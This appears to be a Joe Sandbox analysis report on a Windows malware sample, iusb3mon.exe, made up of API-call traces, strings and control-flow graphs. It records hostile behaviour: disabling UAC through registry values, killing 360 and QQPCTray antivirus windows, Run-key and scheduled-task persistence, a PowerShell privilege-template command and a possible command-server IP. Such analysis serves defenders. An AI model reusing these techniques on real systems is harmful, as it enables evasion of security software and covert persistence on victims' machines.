                                                                                                                     • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$CreateFacet_InitializeInstanceMessageRegisterSleepUninitialize_com_issue_error
                                                                                                                    • String ID: C:\ProgramData\program\iusb3mon.exe$Failed to connect to Task Service.$Failed to create Task Service inst ance.$Failed to create task definition.$Failed to get root folder.$Failed to initialize COM library.$Failed to register task.$Task registered successfully.$User Name$UserLoginStartupTask
                                                                                                                    • API String ID: 1252467509-2564446508
                                                                                                                    • Opcode ID: 539149bf83d13dc1705b2ab51cf02a435a557958a98cd1da3adc777652a3a51e
                                                                                                                    • Instruction ID: 096f7c73bacecdb8a618dff3fa077e232d36315b9b307a8a5cc7329cac5c4ee0
                                                                                                                    • Opcode Fuzzy Hash: 539149bf83d13dc1705b2ab51cf02a435a557958a98cd1da3adc777652a3a51e
                                                                                                                    • Instruction Fuzzy Hash: 16226E70E00609DFDB10DFA8CD45BAEB7B8EF69304F108159E959FB251EB30A985CB61

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 06241B7A
                                                                                                                      • Part of subcall function 06241B34: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,06241B85), ref: 06241B47
                                                                                                                      • Part of subcall function 06241B34: GetProcAddress.KERNEL32(00000000), ref: 06241B4E
                                                                                                                      • Part of subcall function 06241B34: GetCurrentProcess.KERNEL32(00000000,?,?,?,06241B85), ref: 06241B5E
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,-00000200,?), ref: 06241BAD
                                                                                                                    • RegSetValueExA.ADVAPI32(?,ConsentPromptBehaviorAdmin,00000000,00000004,?,00000004), ref: 06241BCB
                                                                                                                    • RegSetValueExA.ADVAPI32(?,EnableLUA,00000000,00000004,?,00000004), ref: 06241BDC
                                                                                                                    • RegSetValueExA.ADVAPI32(?,PromptOnSecureDesktop,00000000,00000004,?,00000004), ref: 06241BED
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 06241BF2
                                                                                                                    Strings
                                                                                                                    • EnableLUA, xrefs: 06241BD4
                                                                                                                    • PromptOnSecureDesktop, xrefs: 06241BE5
                                                                                                                    • ConsentPromptBehaviorAdmin, xrefs: 06241BC3
                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 06241BA0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Value$AddressCloseCurrentHandleModuleOpenProcProcessSleep
                                                                                                                    • String ID: ConsentPromptBehaviorAdmin$EnableLUA$PromptOnSecureDesktop$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                                                                                                    • API String ID: 3477048420-3549642244
                                                                                                                    • Opcode ID: bb6cf85eb6b2109891dbf5d6f7cafecf734f84e5c0948bfe749b1630aea15129
                                                                                                                    • Instruction ID: bedf9604d7ff02df2162cf95fcfe66fd5450346670fd2c7b93d670070724d0ed
                                                                                                                    • Opcode Fuzzy Hash: bb6cf85eb6b2109891dbf5d6f7cafecf734f84e5c0948bfe749b1630aea15129
                                                                                                                    • Instruction Fuzzy Hash: EB0140B156024CBEE751ABA2EC8ADEF7F7CEB81754F10006AB601E1050DA705F54DB70

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 494 6245ce6-6245d16 CreateToolhelp32Snapshot Process32First 495 6245d57-6245d5a 494->495 496 6245d18-6245d31 Process32Next 494->496 497 6245d33-6245d46 call 624a210 496->497 498 6245d4e-6245d55 CloseHandle 496->498 497->496 501 6245d48 497->501 498->495 501->498
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 06245CF6
                                                                                                                    • Process32First.KERNEL32(00000000,?), ref: 06245D0F
                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 06245D2A
                                                                                                                    • CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 06245D4F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 420147892-0
                                                                                                                    • Opcode ID: 73141b703bbb3f6f51f3f4201e6935f0cc765830ded2fde3c62102d71c20f999
                                                                                                                    • Instruction ID: 3a438586a4023560988cef5e7a40500d2e6b3e9e9681dac58cb4215cd3744596
                                                                                                                    • Opcode Fuzzy Hash: 73141b703bbb3f6f51f3f4201e6935f0cc765830ded2fde3c62102d71c20f999
                                                                                                                    • Instruction Fuzzy Hash: 8FF096715112196BEBE1BAA5DC85EEAB7FCEF48354F1000A9ED44E2140DF74C9958A21

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 261 6245e1f-6245e36 262 6245e3b-6245e48 call 6245ce6 261->262 265 6245f21-6245f2e call 6245ce6 262->265 266 6245e4e-6245e67 RegOpenKeyExA 262->266 275 6245f34-6245f4d RegOpenKeyExA 265->275 276 6245fe1-6245ffa RegOpenKeyExA 265->276 267 6245e8c-6245eb1 call 6245da7 Sleep FindWindowA 266->267 268 6245e69-6245e87 call 6247b7d call 6247109 266->268 280 6245ed6-6245ef0 call 6247b7d call 6247109 267->280 281 6245eb3-6245ed1 call 6247b7d call 6247109 267->281 294 6245fb4-6245fb9 call 6255967 268->294 282 6245f6f-6245f94 call 6245da7 Sleep FindWindowA 275->282 283 6245f4f-6245f6d call 6247b7d call 6247109 275->283 277 6246024-6246049 call 6245da7 Sleep FindWindowA 276->277 278 6245ffc-6246016 call 6247b7d call 6247109 276->278 305 624606b-62460ab call 6247b7d call 6247109 call 6255967 call 6247ac4 Sleep WinExec 277->305 306 624604b-6246069 call 6247b7d call 6247109 277->306 320 624601a-624601f call 6255967 278->320 317 6245ef4-6245f1c call 6255967 call 6247ac4 Sleep WinExec 280->317 281->294 300 6245f96-6245fb0 call 6247b7d call 6247109 282->300 301 6245fbe-6245fdc call 6247b7d call 6247109 282->301 283->294 321 624627e-6246289 Sleep 294->321 300->294 301->317 337 62460b1-62460c0 call 6241f38 305->337 306->320 317->321 320->337 321->262 342 62460c5-62460ca 337->342 342->321 344 62460d0-62460f5 call 6245da7 Sleep FindWindowA 342->344 347 62460f7-6246115 call 6247b7d call 6247109 344->347 348 624611a-6246278 call 6247b7d call 6247109 call 6255967 RegOpenKeyExA GetModuleFileNameA call 624a2d0 RegSetValueExA RegCloseKey RegOpenKeyExA GetModuleFileNameA call 624a2d0 RegSetValueExA RegCloseKey RegOpenKeyExA GetModuleFileNameA call 624a2d0 RegSetValueExA RegCloseKey RegOpenKeyExA GetModuleFileNameA call 624a2d0 RegSetValueExA RegCloseKey 344->348 347->294 348->321
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 06245CE6: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 06245CF6
                                                                                                                      • Part of subcall function 06245CE6: Process32First.KERNEL32(00000000,?), ref: 06245D0F
                                                                                                                      • Part of subcall function 06245CE6: Process32Next.KERNEL32(00000000,00000128), ref: 06245D2A
                                                                                                                      • Part of subcall function 06245CE6: CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 06245D4F
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,0626D344,00000000,00020119,?), ref: 06245E63
                                                                                                                    • Sleep.KERNEL32(Q360SafeMonClass), ref: 06245E9D
                                                                                                                    • FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 06245EA9
                                                                                                                    • Sleep.KERNEL32(C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 06245F0A
                                                                                                                    • WinExec.KERNEL32(0626D22C,00000000), ref: 06245F16
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,0626D344,00000000,00020119,?), ref: 06245F49
                                                                                                                    • Sleep.KERNEL32(Q360SafeMonClass), ref: 06245F80
                                                                                                                    • FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 06245F8C
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,0626D344,00000000,00020119,?), ref: 06245FF6
                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 06246283
                                                                                                                      • Part of subcall function 06245DA7: FindWindowA.USER32(?,00000000), ref: 06245DB1
                                                                                                                      • Part of subcall function 06245DA7: PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06245DE5
                                                                                                                      • Part of subcall function 06245DA7: SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06245DF0
                                                                                                                    • Sleep.KERNEL32(Q360SafeMonClass), ref: 06246035
                                                                                                                    • FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 06246041
                                                                                                                    • Sleep.KERNEL32(C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 0624609F
                                                                                                                    • WinExec.KERNEL32(0626D22C,00000000), ref: 062460AB
                                                                                                                    • Sleep.KERNEL32(Q360SafeMonClass), ref: 062460E1
                                                                                                                    • FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 062460ED
                                                                                                                      • Part of subcall function 06247B7D: __EH_prolog.LIBCMT ref: 06247B82
                                                                                                                      • Part of subcall function 06247109: __EH_prolog.LIBCMT ref: 0624710E
                                                                                                                      • Part of subcall function 06247AC4: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Program\iusb3mon.exe,00000000,06278518,06246098,C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 06247ADA
                                                                                                                      • Part of subcall function 06247AC4: WriteFile.KERNEL32(00000000,06268760,00000EE2,?,00000000), ref: 06247AF2
                                                                                                                      • Part of subcall function 06247AC4: CloseHandle.KERNEL32(00000000), ref: 06247AFF
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F023F,?,0000000A), ref: 06246152
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0624615F
                                                                                                                    • RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 0624617B
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 06246185
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F013F,?), ref: 062461A0
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 062461B0
                                                                                                                    • RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 062461CC
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 062461D6
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F023F,?), ref: 062461F1
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06246201
                                                                                                                    • RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 0624621D
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 06246227
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F013F,?), ref: 06246242
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06246252
                                                                                                                    • RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 0624626E
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 06246278
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: OpenSleep$CloseFile$FindWindow$ModuleNameValue$CreateExecH_prologHandleMessageProcess32$FirstNextPostSendSnapshotToolhelp32Write
                                                                                                                    • String ID: C:\ProgramData\Microsoft\MicrosoftNetFramework.xml$C:\ProgramData\Program\iusb3mon.exe$Microsoft$Q360SafeMonClass$QQPCTray.exe$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$qqpctray.exe
                                                                                                                    • API String ID: 3575359619-3011562891
                                                                                                                    • Opcode ID: 035068197325e54d88c3624c55127b7628b1c6f45e536df651c954fd3327c4db
                                                                                                                    • Instruction ID: 683e51c70e1dfb654275e9d9842744d88857216f404f982d7d4853891033f5eb
                                                                                                                    • Opcode Fuzzy Hash: 035068197325e54d88c3624c55127b7628b1c6f45e536df651c954fd3327c4db
                                                                                                                    • Instruction Fuzzy Hash: 94A1A271368349BFE2D8BB61AC95E7A7A9DEF40B04F01081DFE95A5481CBB0C9448F62

Control-flow Graph

APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 062465AB
• CreateDirectoryA.KERNEL32(?,00000000), ref: 06246600
• SetFileAttributesA.KERNEL32(?,00000002,0000000A), ref: 0624663D
• WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'),00000000), ref: 06246668
  • Part of subcall function 06247B7D: __EH_prolog.LIBCMT ref: 06247B82
  • Part of subcall function 06247109: __EH_prolog.LIBCMT ref: 0624710E
• GetFileAttributesA.KERNEL32(C:\ProgramData\Program\iusb3mon.exe), ref: 06246673
• CopyFileA.KERNEL32(?,?,00000000), ref: 06246690
• CopyFileA.KERNEL32(C:\ProgramData\iusb3mon.dat,C:\ProgramData\Program\iusb3mon.dat,00000001), ref: 062466C6
• CopyFileA.KERNEL32(C:\ProgramData\templateWatch.dat,C:\ProgramData\Program\templateWatch.dat,00000001), ref: 062466D5
• Sleep.KERNEL32(000000C8), ref: 062466DC
• WinExec.KERNEL32(cmd /c echo.>c:\inst.ini,00000000), ref: 06246739
• Sleep.KERNEL32(000000C8), ref: 06246744
Strings
• C:\ProgramData\Program\iusb3mon.dat, xrefs: 062466B9, 062466C0, 062466F0
• Create Successed!, xrefs: 06246643
• C:\ProgramData\templateWatch.dat, xrefs: 062466D0
• 360Tray.exe, xrefs: 06246703
• cmd /c echo.>c:\inst.ini, xrefs: 06246734
• 360tray.exe, xrefs: 06246712
• C:\ProgramData\Program\, xrefs: 062465B8
• iusb3mon.exe, xrefs: 062465D9
• : Not Exist, xrefs: 0624660E
• C:\ProgramData\Program\templateWatch.dat, xrefs: 062466C8, 062466CF, 062466F8
• C:\ProgramData\Program, xrefs: 062465E7
• c:\inst.ini, xrefs: 06246722
• powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'), xrefs: 06246663
• C:\ProgramData\iusb3mon.dat, xrefs: 062466C1
• C:\ProgramData\Program\iusb3mon.exe, xrefs: 0624666E, 062466E4
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: File$Copy$AttributesExecH_prologSleep$CreateDirectoryModuleName
• String ID: : Not Exist$360Tray.exe$360tray.exe$C:\ProgramData\Program$C:\ProgramData\Program\$C:\ProgramData\Program\iusb3mon.dat$C:\ProgramData\Program\iusb3mon.exe$C:\ProgramData\Program\templateWatch.dat$C:\ProgramData\iusb3mon.dat$C:\ProgramData\templateWatch.dat$Create Successed!$c:\inst.ini$cmd /c echo.>c:\inst.ini$iusb3mon.exe$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"')
• API String ID: 1478482640-228079196
• Opcode ID: 2e7c23485c49af885fa53422e868b1f3d479fce307762253116e96639cdf5f10
• Instruction ID: ba43ec8972423323e17e4c2fa6dc17bb8c3c97f428b767622500cd973cfe6a31
• Opcode Fuzzy Hash: 2e7c23485c49af885fa53422e868b1f3d479fce307762253116e96639cdf5f10
• Instruction Fuzzy Hash: D241C93277434576E5E876B27C89F6F365D9F85B20F010919FE24E60C0DEB4D5808B62

Control-flow Graph

APIs
• FindWindowA.USER32(00000000,0626DD60), ref: 06246521
• ShowWindow.USER32(00000000,00000000), ref: 06246525
• FindWindowA.USER32(00000000,0626DD54), ref: 0624652D
• ShowWindow.USER32(00000000,00000000), ref: 06246531
• FindWindowA.USER32(00000000,0626DD44), ref: 06246539
• ShowWindow.USER32(00000000,00000000), ref: 0624653D
• FindWindowA.USER32(00000000,0626DD38), ref: 06246545
• ShowWindow.USER32(00000000,00000000), ref: 06246549
• FindWindowA.USER32(00000000,---------==============), ref: 06246551
• ShowWindow.USER32(00000000,00000000), ref: 06246555
• FindWindowA.USER32(00000000,===========-----------), ref: 0624655D
• ShowWindow.USER32(00000000,00000000), ref: 06246561
• FindWindowA.USER32(00000000,0626DCF8), ref: 06246569
• SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06246574
• Sleep.KERNEL32(000000C8), ref: 0624657F
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: Window$Find$Show$MessageSendSleep
• String ID: ---------==============$===========-----------
• API String ID: 155205692-1512992862
• Opcode ID: 44b94ac4c22ee21d7b15dc20aff48e835ebf443c3cc03ce15c99ce79a022cdc7
• Instruction ID: 11891ef489c239accb7b9e41731426e52bec036d99aa696303d0ef97411358ba
• Opcode Fuzzy Hash: 44b94ac4c22ee21d7b15dc20aff48e835ebf443c3cc03ce15c99ce79a022cdc7
• Instruction Fuzzy Hash: 7DF0B7E2FA036D39E9B43BB35CCDD6F1D5CDE956997021C11BA06A205188B8DC80CEB0

Control-flow Graph

APIs
• CreateMutexA.KERNEL32(00000000,00000000,LJPXYXC,202.79.169.178,0626CC34,06246CAB), ref: 06245729
• GetLastError.KERNEL32 ref: 06245731
• CloseHandle.KERNEL32(00000000), ref: 0624573F
• Sleep.KERNEL32(000003E8), ref: 06245761
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0624577F
• CloseHandle.KERNEL32(00000000), ref: 06245786
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreateErrorLastMutexObjectSingleSleepWait
• String ID: 202.79.169.178$LJPXYXC
• API String ID: 3934243189-1033937695
• Opcode ID: 2dc99946951642fe9f9b872443e811e8c14ed0c596a7218037d5eacd9d3004aa
• Instruction ID: 6ca4abe5fb959b9ba659564bf3ab0fbcbd81969aec76314b9be46618149bdd85
• Opcode Fuzzy Hash: 2dc99946951642fe9f9b872443e811e8c14ed0c596a7218037d5eacd9d3004aa
• Instruction Fuzzy Hash: 81F04931927231BBD2B53B227C4DCDB2D1EDF476B1B110610FA5DA4084DA684641CAF2

Control-flow Graph

APIs
• SetThreadExecutionState.KERNEL32(80000003), ref: 0624678E
• SetThreadExecutionState.KERNEL32(80000003), ref: 06246791
• SetThreadExecutionState.KERNEL32(80000001), ref: 0624679C
• Sleep.KERNEL32(000003E8), ref: 062467AE
• OutputDebugStringA.KERNEL32(Thread running...), ref: 062467B9
• OutputDebugStringA.KERNEL32(Thread Exit...), ref: 062467C3
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: ExecutionStateThread$DebugOutputString$Sleep
• String ID: Thread Exit...$Thread running...
• API String ID: 3332416543-10974087
• Opcode ID: e5e7951f577729938b56c9390870e581b71c1ddff27c51d9dd0ab0a6adef9d09
• Instruction ID: dba079147afad2a4a9f65cceb6ccec6d379b43eeb70fa930b314106c7becb565
• Opcode Fuzzy Hash: e5e7951f577729938b56c9390870e581b71c1ddff27c51d9dd0ab0a6adef9d09
• Instruction Fuzzy Hash: DBE02622F7432A66E3A133B67C84E2A699DDF96620B160427FE04E3104CA605D414FF2

Control-flow Graph

APIs
• PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06245DE5
• SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06245DF0
• FindWindowA.USER32(?,00000000), ref: 06245DB1
  • Part of subcall function 06247B7D: __EH_prolog.LIBCMT ref: 06247B82
  • Part of subcall function 06247109: __EH_prolog.LIBCMT ref: 0624710E
Strings
• C:\ProgramData\Program\iusb3mon.exe, xrefs: 06245DA8
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: H_prologMessage$FindPostSendWindow
• String ID: C:\ProgramData\Program\iusb3mon.exe
• API String ID: 1670880786-3106534563
• Opcode ID: 39c89ce2fc6034b9faeca0578176de5947099def54e9daebec108a7372348201
• Instruction ID: 9bca5833c48fcf45ba4b0f597bcf1e807c88124f948506aef919ca1cf3757cdb
• Opcode Fuzzy Hash: 39c89ce2fc6034b9faeca0578176de5947099def54e9daebec108a7372348201
• Instruction Fuzzy Hash: C5F096723603597FF5ED36607CD9E7E1159CB80F95F110439FA7175180CEB44D414AA6

Control-flow Graph

APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 06248D33
